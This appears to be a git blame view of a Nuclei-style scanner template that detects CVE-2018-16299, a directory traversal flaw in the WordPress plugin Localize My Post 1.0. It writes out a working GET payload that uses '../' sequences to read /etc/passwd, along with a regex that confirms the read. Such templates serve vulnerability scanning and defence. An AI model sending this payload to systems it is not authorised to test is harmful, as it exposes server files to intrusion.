2021-06-25 07:13:55 +00:00
|
|
|
id: CVE-2018-16299
|
2021-06-24 22:46:32 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: WordPress Plugin Localize My Post 1.0 - LFI
|
2021-07-19 12:47:12 +00:00
|
|
|
author: 0x_Akoko,0x240x23elu
|
2021-06-24 22:46:32 +00:00
|
|
|
severity: high
|
2021-08-30 09:50:56 +00:00
|
|
|
description: The Localize My Post plugin 1.0 for WordPress allows Directory Traversal via the ajax/include.php file parameter.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://www.exploit-db.com/exploits/45439
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 7.5
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2018-16299
|
|
|
|
cwe-id: CWE-22
|
2022-04-22 10:38:41 +00:00
|
|
|
tags: wordpress,cve2018,cve,lfi,plugin
|
2021-06-24 22:46:32 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
|
|
|
|
- type: regex
|
|
|
|
regex:
|
2022-03-22 08:01:31 +00:00
|
|
|
- "root:.*:0:0:"
|
2021-06-24 22:46:32 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|